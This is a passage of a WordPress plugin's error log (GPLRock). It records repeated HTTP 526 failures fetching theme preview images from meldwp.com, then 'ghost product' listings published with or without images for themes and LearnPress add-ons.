failed for product fusion-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:51 UTC] GPLRock: Image download failed for product fusion-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fusion--portfolio-wordpress-theme-9046.webp for product fusion-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:39:53 UTC] GPLRock: Image download failed for product fusion-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:55 UTC] GPLRock: Image download failed for product fusion-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fusion--portfolio-wordpress-theme-9046.webp for product fusion-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:39:57 UTC] GPLRock WARNING: Image download failed for product fusion-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fusion--portfolio-wordpress-theme-9046.webp [06-Apr-2026 18:39:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fusion-portfolio-wordpress-theme [06-Apr-2026 18:39:57 UTC] GPLRock: Image download failed for product frintem-printing-company-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:59 UTC] GPLRock: Image download failed for product frintem-printing-company-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/frintem---printing-company-wordpress-theme--rtl-22759.webp for product frintem-printing-company-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:40:02 UTC] GPLRock: Image download failed for product frintem-printing-company-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:04 UTC] GPLRock: Image download failed for product frintem-printing-company-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/frintem---printing-company-wordpress-theme--rtl-22759.webp for product frintem-printing-company-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:40:06 UTC] GPLRock WARNING: Image download failed for product frintem-printing-company-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/frintem---printing-company-wordpress-theme--rtl-22759.webp [06-Apr-2026 18:40:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: frintem-printing-company-wordpress-theme-rtl [06-Apr-2026 18:40:06 UTC] GPLRock: Image download failed for product cozystay-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:08 UTC] GPLRock: Image download failed for product cozystay-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cozystay---hotel-booking-wordpress-theme-29064.webp for product cozystay-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:40:11 UTC] GPLRock: Image download failed for product cozystay-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:13 UTC] GPLRock: Image download failed for product cozystay-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cozystay---hotel-booking-wordpress-theme-29064.webp for product cozystay-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:40:15 UTC] GPLRock WARNING: Image download failed for product cozystay-hotel-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cozystay---hotel-booking-wordpress-theme-29064.webp [06-Apr-2026 18:40:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cozystay-hotel-booking-wordpress-theme [06-Apr-2026 18:40:15 UTC] GPLRock: Image download failed for product robor-ai-and-automation-integration-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:17 UTC] GPLRock: Image download failed for product robor-ai-and-automation-integration-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/robor--ai-and-automation-integration-wordpress-theme-10061.webp for product robor-ai-and-automation-integration-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:40:19 UTC] GPLRock: Image download failed for product robor-ai-and-automation-integration-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:21 UTC] GPLRock: Image download failed for product robor-ai-and-automation-integration-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/robor--ai-and-automation-integration-wordpress-theme-10061.webp for product robor-ai-and-automation-integration-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:40:24 UTC] GPLRock WARNING: Image download failed for product robor-ai-and-automation-integration-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/robor--ai-and-automation-integration-wordpress-theme-10061.webp [06-Apr-2026 18:40:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: robor-ai-and-automation-integration-wordpress-theme [06-Apr-2026 18:40:25 UTC] GPLRock: Image download failed for product axios-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:27 UTC] GPLRock: Image download failed for product axios-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/axios---digital-agency-wordpress-theme-1872.webp for product axios-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:40:29 UTC] GPLRock: Image download failed for product axios-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:31 UTC] GPLRock: Image download failed for product axios-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/axios---digital-agency-wordpress-theme-1872.webp for product axios-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:40:33 UTC] GPLRock WARNING: Image download failed for product axios-digital-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/axios---digital-agency-wordpress-theme-1872.webp [06-Apr-2026 18:40:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: axios-digital-agency-wordpress-theme [06-Apr-2026 18:40:34 UTC] GPLRock: Image download failed for product eremia-ajax-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:36 UTC] GPLRock: Image download failed for product eremia-ajax-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eremia---ajax-portfolio-wordpress-theme-8286.webp for product eremia-ajax-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:40:38 UTC] GPLRock: Image download failed for product eremia-ajax-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:40 UTC] GPLRock: Image download failed for product eremia-ajax-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eremia---ajax-portfolio-wordpress-theme-8286.webp for product eremia-ajax-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:40:42 UTC] GPLRock WARNING: Image download failed for product eremia-ajax-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/eremia---ajax-portfolio-wordpress-theme-8286.webp [06-Apr-2026 18:40:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eremia-ajax-portfolio-wordpress-theme [06-Apr-2026 18:40:42 UTC] GPLRock: Image download failed for product zalo-fashion-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:44 UTC] GPLRock: Image download failed for product zalo-fashion-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zalo-fashion---woocommerce-theme-3658.webp for product zalo-fashion-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:40:47 UTC] GPLRock: Image download failed for product zalo-fashion-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:49 UTC] GPLRock: Image download failed for product zalo-fashion-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:40:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zalo-fashion---woocommerce-theme-3658.webp for product zalo-fashion-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:40:51 UTC] GPLRock WARNING: Image download failed for product zalo-fashion-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/zalo-fashion---woocommerce-theme-3658.webp [06-Apr-2026 18:40:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zalo-fashion-woocommerce-theme [06-Apr-2026 18:43:00 UTC] GPLRock: Image downloaded successfully for product learnpress-stripe-payment (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-10b89180.jpg [06-Apr-2026 18:43:00 UTC] GPLRock: Using pre-downloaded image for product learnpress-stripe-payment: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-10b89180.jpg [06-Apr-2026 18:43:00 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-stripe-payment [06-Apr-2026 18:43:02 UTC] GPLRock: Image downloaded successfully for product learnpress-content-drip (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-51087f32.jpg [06-Apr-2026 18:43:02 UTC] GPLRock: Using pre-downloaded image for product learnpress-content-drip: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-51087f32.jpg [06-Apr-2026 18:43:02 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-content-drip [06-Apr-2026 18:43:04 UTC] GPLRock: Image downloaded successfully for product learnpress-co-instructors (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-894e3dca.jpg [06-Apr-2026 18:43:04 UTC] GPLRock: Using pre-downloaded image for product learnpress-co-instructors: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-894e3dca.jpg [06-Apr-2026 18:43:04 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-co-instructors [06-Apr-2026 18:43:06 UTC] GPLRock: Image downloaded successfully for product learnpress-authorize-net-payment (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1fbf6dfd.jpg [06-Apr-2026 18:43:06 UTC] GPLRock: Using pre-downloaded image for product learnpress-authorize-net-payment: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1fbf6dfd.jpg [06-Apr-2026 18:43:06 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-authorize-net-payment [06-Apr-2026 18:43:08 UTC] GPLRock: Image downloaded successfully for product learnpress-collections (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f96e702b.jpg [06-Apr-2026 18:43:08 UTC] GPLRock: Using pre-downloaded image for product learnpress-collections: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f96e702b.jpg [06-Apr-2026 18:43:08 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-collections [06-Apr-2026 18:43:10 UTC] GPLRock: Image downloaded successfully for product learnpress-mycred-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-285175c3.jpg [06-Apr-2026 18:43:10 UTC] GPLRock: Using pre-downloaded image for product learnpress-mycred-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-285175c3.jpg [06-Apr-2026 18:43:10 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-mycred-integration [06-Apr-2026 18:43:12 UTC] GPLRock: Image downloaded successfully for product learnpress-random-quiz (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8363b5c0.jpg [06-Apr-2026 18:43:12 UTC] GPLRock: Using pre-downloaded image for product learnpress-random-quiz: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8363b5c0.jpg [06-Apr-2026 18:43:12 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-random-quiz [06-Apr-2026 18:43:14 UTC] GPLRock: Image downloaded successfully for product learnpress-sorting-choice-question (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0efa94aa.jpg [06-Apr-2026 18:43:14 UTC] GPLRock: Using pre-downloaded image for product learnpress-sorting-choice-question: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0efa94aa.jpg [06-Apr-2026 18:43:14 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-sorting-choice-question [06-Apr-2026 18:43:15 UTC] GPLRock: Image downloaded successfully for product facetwp-flyout (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a344a40a.jpg [06-Apr-2026 18:43:15 UTC] GPLRock: Using pre-downloaded image for product facetwp-flyout: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a344a40a.jpg [06-Apr-2026 18:43:15 UTC] GPLRock: Ghost product published with image - Product ID: facetwp-flyout [06-Apr-2026 18:43:17 UTC] GPLRock: Image downloaded successfully for product searchwp-xpdf-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-35ec2774.jpg [06-Apr-2026 18:43:19 UTC] GPLRock: Using pre-downloaded image for product searchwp-xpdf-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-35ec2774.jpg [06-Apr-2026 18:43:19 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-xpdf-integration [06-Apr-2026 18:43:56 UTC] GPLRock: Image download failed for product croma-music-wordpress-theme-with-ajax-and-continuous-playback (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:43:58 UTC] GPLRock: Image download failed for product croma-music-wordpress-theme-with-ajax-and-continuous-playback (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/croma---music-wordpress-theme-with-ajax-and-continuous-playback-8628.webp for product croma-music-wordpress-theme-with-ajax-and-continuous-playback after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:44:00 UTC] GPLRock: Image download failed for product croma-music-wordpress-theme-with-ajax-and-continuous-playback (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:02 UTC] GPLRock: Image download failed for product croma-music-wordpress-theme-with-ajax-and-continuous-playback (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/croma---music-wordpress-theme-with-ajax-and-continuous-playback-8628.webp for product croma-music-wordpress-theme-with-ajax-and-continuous-playback after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:44:05 UTC] GPLRock WARNING: Image download failed for product croma-music-wordpress-theme-with-ajax-and-continuous-playback. URL: https://meldwp.com/wp-content/uploads/croma---music-wordpress-theme-with-ajax-and-continuous-playback-8628.webp [06-Apr-2026 18:44:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: croma-music-wordpress-theme-with-ajax-and-continuous-playback [06-Apr-2026 18:44:05 UTC] GPLRock: Image download failed for product archtech-a-responsive-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:07 UTC] GPLRock: Image download failed for product archtech-a-responsive-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/archtech---a-responsive-architecture-wordpress-theme-26096.webp for product archtech-a-responsive-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:44:09 UTC] GPLRock: Image download failed for product archtech-a-responsive-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:11 UTC] GPLRock: Image download failed for product archtech-a-responsive-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/archtech---a-responsive-architecture-wordpress-theme-26096.webp for product archtech-a-responsive-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:44:13 UTC] GPLRock WARNING: Image download failed for product archtech-a-responsive-architecture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/archtech---a-responsive-architecture-wordpress-theme-26096.webp [06-Apr-2026 18:44:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: archtech-a-responsive-architecture-wordpress-theme [06-Apr-2026 18:44:14 UTC] GPLRock: Image download failed for product a-mart-organic-products-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:16 UTC] GPLRock: Image download failed for product a-mart-organic-products-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/a-mart---organic-products-shop-wordpress-theme-20683.webp for product a-mart-organic-products-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:44:18 UTC] GPLRock: Image download failed for product a-mart-organic-products-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:20 UTC] GPLRock: Image download failed for product a-mart-organic-products-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/a-mart---organic-products-shop-wordpress-theme-20683.webp for product a-mart-organic-products-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:44:22 UTC] GPLRock WARNING: Image download failed for product a-mart-organic-products-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/a-mart---organic-products-shop-wordpress-theme-20683.webp [06-Apr-2026 18:44:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: a-mart-organic-products-shop-wordpress-theme [06-Apr-2026 18:44:22 UTC] GPLRock: Image download failed for product impacto-patronus-nature-protection-petitions-social-activism-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:24 UTC] GPLRock: Image download failed for product impacto-patronus-nature-protection-petitions-social-activism-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/impacto-patronus--nature-protection-petitions--social-activism-wordpress-theme---16130.webp for product impacto-patronus-nature-protection-petitions-social-activism-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:44:27 UTC] GPLRock: Image download failed for product impacto-patronus-nature-protection-petitions-social-activism-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:29 UTC] GPLRock: Image download failed for product impacto-patronus-nature-protection-petitions-social-activism-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/impacto-patronus--nature-protection-petitions--social-activism-wordpress-theme---16130.webp for product impacto-patronus-nature-protection-petitions-social-activism-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:44:31 UTC] GPLRock WARNING: Image download failed for product impacto-patronus-nature-protection-petitions-social-activism-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/impacto-patronus--nature-protection-petitions--social-activism-wordpress-theme---16130.webp [06-Apr-2026 18:44:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: impacto-patronus-nature-protection-petitions-social-activism-wordpress-theme-rtl [06-Apr-2026 18:44:31 UTC] GPLRock: Image download failed for product photographer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:33 UTC] GPLRock: Image download failed for product photographer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/photographer-wordpress-theme-16300.webp for product photographer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:44:35 UTC] GPLRock: Image download failed for product photographer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:37 UTC] GPLRock: Image download failed for product photographer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/photographer-wordpress-theme-16300.webp for product photographer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:44:40 UTC] GPLRock WARNING: Image download failed for product photographer-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/photographer-wordpress-theme-16300.webp [06-Apr-2026 18:44:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: photographer-wordpress-theme [06-Apr-2026 18:44:40 UTC] GPLRock: Image download failed for product mafoil-fashion-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:42 UTC] GPLRock: Image download failed for product mafoil-fashion-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mafoil--fashion-store-woocommerce-wordpress-theme-5512.webp for product mafoil-fashion-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:44:44 UTC] GPLRock: Image download failed for product mafoil-fashion-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:46 UTC] GPLRock: Image download failed for product mafoil-fashion-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mafoil--fashion-store-woocommerce-wordpress-theme-5512.webp for product mafoil-fashion-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:44:48 UTC] GPLRock WARNING: Image download failed for product mafoil-fashion-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mafoil--fashion-store-woocommerce-wordpress-theme-5512.webp [06-Apr-2026 18:44:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mafoil-fashion-store-woocommerce-wordpress-theme [06-Apr-2026 18:44:48 UTC] GPLRock: Image download failed for product fungi-one-page-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:51 UTC] GPLRock: Image download failed for product fungi-one-page-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fungi---one-page-personal-portfolio-wordpress-theme-21981.webp for product fungi-one-page-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:44:53 UTC] GPLRock: Image download failed for product fungi-one-page-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:55 UTC] GPLRock: Image download failed for product fungi-one-page-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fungi---one-page-personal-portfolio-wordpress-theme-21981.webp for product fungi-one-page-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:44:57 UTC] GPLRock WARNING: Image download failed for product fungi-one-page-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fungi---one-page-personal-portfolio-wordpress-theme-21981.webp [06-Apr-2026 18:44:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fungi-one-page-personal-portfolio-wordpress-theme [06-Apr-2026 18:44:57 UTC] GPLRock: Image download failed for product bugspatrol-pest-insects-control-disinsection-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:44:59 UTC] GPLRock: Image download failed for product bugspatrol-pest-insects-control-disinsection-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:45:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bugspatrol---pest--insects-control-disinsection-services-wordpress-theme-1010.webp for product bugspatrol-pest-insects-control-disinsection-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:45:02 UTC] GPLRock: Image download failed for product bugspatrol-pest-insects-control-disinsection-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:45:04 UTC] GPLRock: Image download failed for product bugspatrol-pest-insects-control-disinsection-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:45:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bugspatrol---pest--insects-control-disinsection-services-wordpress-theme-1010.webp for product bugspatrol-pest-insects-control-disinsection-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:45:06 UTC] GPLRock WARNING: Image download failed for product bugspatrol-pest-insects-control-disinsection-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bugspatrol---pest--insects-control-disinsection-services-wordpress-theme-1010.webp [06-Apr-2026 18:45:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bugspatrol-pest-insects-control-disinsection-services-wordpress-theme [06-Apr-2026 18:45:06 UTC] GPLRock: Image download failed for product wastey-waste-pickup-and-disposal-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:45:08 UTC] GPLRock: Image download failed for product wastey-waste-pickup-and-disposal-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:45:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wastey---waste-pickup-and-disposal-services-wordpress-theme-26050.webp for product wastey-waste-pickup-and-disposal-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:45:11 UTC] GPLRock: Image download failed for product wastey-waste-pickup-and-disposal-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:45:13 UTC] GPLRock: Image download failed for product wastey-waste-pickup-and-disposal-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:45:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wastey---waste-pickup-and-disposal-services-wordpress-theme-26050.webp for product wastey-waste-pickup-and-disposal-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:45:15 UTC] GPLRock WARNING: Image download failed for product wastey-waste-pickup-and-disposal-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wastey---waste-pickup-and-disposal-services-wordpress-theme-26050.webp [06-Apr-2026 18:45:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wastey-waste-pickup-and-disposal-services-wordpress-theme [06-Apr-2026 18:45:15 UTC] GPLRock: Image download failed for product fluffypaw-wordpress-theme-for-veterinary-clinic-pet-care-center (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:45:17 UTC] GPLRock: Image download failed for product fluffypaw-wordpress-theme-for-veterinary-clinic-pet-care-center (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:45:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fluffypaw---wordpress-theme-for-veterinary-clinic--pet-care-center-10203.webp for product 